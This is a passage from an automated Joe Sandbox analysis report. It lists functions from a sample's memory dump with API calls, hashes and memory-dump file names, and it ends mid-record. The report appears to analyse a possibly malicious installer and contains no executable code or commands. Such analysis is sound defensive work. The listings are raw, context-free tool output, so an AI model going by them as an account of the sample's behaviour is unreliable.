                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000000,00000000,00000000), ref: 00403561
                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 004035D6
                                                                                                                                                                                                                                                              • WriteFile.KERNEL32 ref: 00403606
                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 00403612
                                                                                                                                                                                                                                                                • Part of subcall function 00403D52: SetFilePointer.KERNEL32 ref: 00403D89
                                                                                                                                                                                                                                                                • Part of subcall function 00403D52: ReadFile.KERNELBASE ref: 00403DD5
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$Global$AllocFreePointerRead$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3222491521-0
                                                                                                                                                                                                                                                              • Opcode ID: 45a2652db95930afc0c21eb3acc2770334267af0a9acbac9f1e064d40d96745d
                                                                                                                                                                                                                                                              • Instruction ID: 4c510bf6e2d4d1f92ab55f121e890243c90c0ce65b69a7146e7506ad40f7442f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45a2652db95930afc0c21eb3acc2770334267af0a9acbac9f1e064d40d96745d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51510BB0A087009FD710EF29C844B6EBBF4AF84315F01896EE598E7391D7389985CF56
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0041EA35 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 109COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: __calloc_crt__init_pointers__mtterm_free
                                                                                                                                                                                                                                                              • String ID: +4@$j#@
                                                                                                                                                                                                                                                              • API String ID: 3556499859-900460420
                                                                                                                                                                                                                                                              • Opcode ID: 7e97e4acc74e714af7e785587c95f69a471fbafb9884106baa4076a7f5e25f63
                                                                                                                                                                                                                                                              • Instruction ID: b419fd80023186233bebc3504c041f432485d35e9ebb5b922793ae927fb2013c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e97e4acc74e714af7e785587c95f69a471fbafb9884106baa4076a7f5e25f63
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 263199B5A023009BD7309F76AD88A5A7EA4EB44760750453BEC15A32F0DB7844C2DFDD
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040247C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CapsCreateDeviceFontIndirectwsprintf
                                                                                                                                                                                                                                                              • String ID: H$Z
                                                                                                                                                                                                                                                              • API String ID: 1586071882-4221459494
                                                                                                                                                                                                                                                              • Opcode ID: 6ba865e7aa06ec9b82b87e11a18cb297cb487d698daa1d8c739eb9ff96728af6
                                                                                                                                                                                                                                                              • Instruction ID: fe53f9027c55cc81bf00ecbd586396b11bfc2b5e7faefd45710aa59a0b9b721a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ba865e7aa06ec9b82b87e11a18cb297cb487d698daa1d8c739eb9ff96728af6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC218CB29092009FD310BF68DD446AABBF8FB89304F04C97EE088E3251C3B84555CB6A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004039FE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • DestroyWindow.USER32 ref: 00403A17
                                                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403A48
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00403A83
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SetWindowTextA.USER32 ref: 00407061
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070A1
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070CF
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070EE
                                                                                                                                                                                                                                                              • CreateDialogParamA.USER32 ref: 00403AC3
                                                                                                                                                                                                                                                              • ShowWindow.USER32 ref: 00403ADC
                                                                                                                                                                                                                                                                • Part of subcall function 0040392C: MulDiv.KERNEL32 ref: 00403953
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: MessageSendWindow$CountCreateDestroyDialogParamShowTextTickwsprintf
                                                                                                                                                                                                                                                              • String ID: o
                                                                                                                                                                                                                                                              • API String ID: 2510787843-252678980
                                                                                                                                                                                                                                                              • Opcode ID: c8bf9b50f24b706e34797b8f036d4915f5a4dc7d81babb649c8bf478da5301e9
                                                                                                                                                                                                                                                              • Instruction ID: 81059e3b479639814b0572c15c12751123e1a1ca33ddd0d88914a755a74492f9
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8bf9b50f24b706e34797b8f036d4915f5a4dc7d81babb649c8bf478da5301e9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB21FCB06083059FD710AF65E58875A7FE8FB44309F40843EE4C5A72A1DB798585CF9A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004201A0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 004201AC
                                                                                                                                                                                                                                                                • Part of subcall function 0041E8EC: __getptd_noexit.LIBCMT ref: 0041E8EF
                                                                                                                                                                                                                                                                • Part of subcall function 0041E8EC: __amsg_exit.LIBCMT ref: 0041E8FC
                                                                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 004201CC
                                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 004201DC
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0042020C
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                                                              • String ID: /8@$}6@
                                                                                                                                                                                                                                                              • API String ID: 3170801528-2566543373
                                                                                                                                                                                                                                                              • Opcode ID: 4e877f5fdfbd5a7843aadfdca11496e6b7c2b935120cf88deeaa281316c36af8
                                                                                                                                                                                                                                                              • Instruction ID: 3421f67be82abb873178b65f0fa18ed5a2474267da0896d5093bbf8687c05708
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e877f5fdfbd5a7843aadfdca11496e6b7c2b935120cf88deeaa281316c36af8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF018271F01631DBC721AB66A80579AB3A0AF04750F85405BFC10A7282D73C5CA2DBEE
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040395E Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 44timeCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: TextTimerWindowwsprintf
                                                                                                                                                                                                                                                              • String ID: @Vl$unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                                                                                                                                              • API String ID: 2438957755-2821168704
                                                                                                                                                                                                                                                              • Opcode ID: bd030a2e39a026ec07ab4720bfc960c357e51ed8894618a1f4644a08019d69f6
                                                                                                                                                                                                                                                              • Instruction ID: 5883a2093b31581e9909bbd4cee83827143d54294f5a20fab69da977af55eaa0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd030a2e39a026ec07ab4720bfc960c357e51ed8894618a1f4644a08019d69f6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9015EB0908304AFD710AF24D48525EBFE8EB48355F50C83EE58997281C7B895859B8A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00406557 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54windowCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                              • String ID: f
                                                                                                                                                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                              • Opcode ID: f6519dfc4b30f4dc8ba30da0d317b8fe5b2658bb7498cf5162ba835f3d9dec96
                                                                                                                                                                                                                                                              • Instruction ID: 922df396bf3e7088f2107368fcd68d656d94b82640ce54d584134d1287f84c7b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6519dfc4b30f4dc8ba30da0d317b8fe5b2658bb7498cf5162ba835f3d9dec96
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E2117B0804308EFDB10AFA9D88829EBFF4EF84314F00C91EE99557281D7B98459CF96
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004023CD Relevance: 7.5, APIs: 5, Instructions: 49windowCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1849352358-0
                                                                                                                                                                                                                                                              • Opcode ID: 60c780fcda1c8af6e6133ad9a4d8ec0100c641f8e2cdb65479381e5a6c7e35a1
                                                                                                                                                                                                                                                              • Instruction ID: cc0e0ed40c1b01d4689f9a1fbf3506c826ac2f4514953f540462daef50695e08
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 60c780fcda1c8af6e6133ad9a4d8ec0100c641f8e2cdb65479381e5a6c7e35a1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF1128B19083009FD710EF69D94839EFBF4FB88315F41886EE58897260D7789985CF46
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0041FF04 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 0041FF10
                                                                                                                                                                                                                                                                • Part of subcall function 0041E8EC: __getptd_noexit.LIBCMT ref: 0041E8EF
                                                                                                                                                                                                                                                                • Part of subcall function 0041E8EC: __amsg_exit.LIBCMT ref: 0041E8FC
                                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 0041FF27
                                                                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 0041FF35
                                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 0041FF45
                                                                                                                                                                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0041FF59
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 938513278-0
                                                                                                                                                                                                                                                              • Opcode ID: f21500c51096b77fb6e6c258bf920da67224a17f81b66f3bb7fb224cf842ccf5
                                                                                                                                                                                                                                                              • Instruction ID: 7e7f6c74772a686082d6cc401d7e75e34e2fd6947e407cad35963450ca5303f8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f21500c51096b77fb6e6c258bf920da67224a17f81b66f3bb7fb224cf842ccf5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6F06232E446109BD724BB6694037CA33909F00718F10015FF810962D2CBAC59C7D65E
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004215F3 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 196COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _calloc
                                                                                                                                                                                                                                                              • String ID: tl_$!@
                                                                                                                                                                                                                                                              • API String ID: 1679841372-1576196623
                                                                                                                                                                                                                                                              • Opcode ID: 58271538553b7ca7c397637b8025ee23a1221f323fde5ae62b851eef76c20325
                                                                                                                                                                                                                                                              • Instruction ID: 175e3b3413a6258ebf0c2aba3c3ac84c458b3efbb54d17ae357dd09b502dd923
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 58271538553b7ca7c397637b8025ee23a1221f323fde5ae62b851eef76c20325
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 475162B1904310AFD320EF64ED8496B77ACF798314F80493EFA5A63221D77898458BED
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004021EA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92windowtimeCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                              • String ID: !
                                                                                                                                                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                              • Opcode ID: 2cc29927f3ec91eee7d09198da7ebeb8ff0ee3a72548320396241a9f7b96623c
                                                                                                                                                                                                                                                              • Instruction ID: 44a3fc30e96862f4ab83f2000289962126a1aacc9fedf5fff1005c7057c09f36
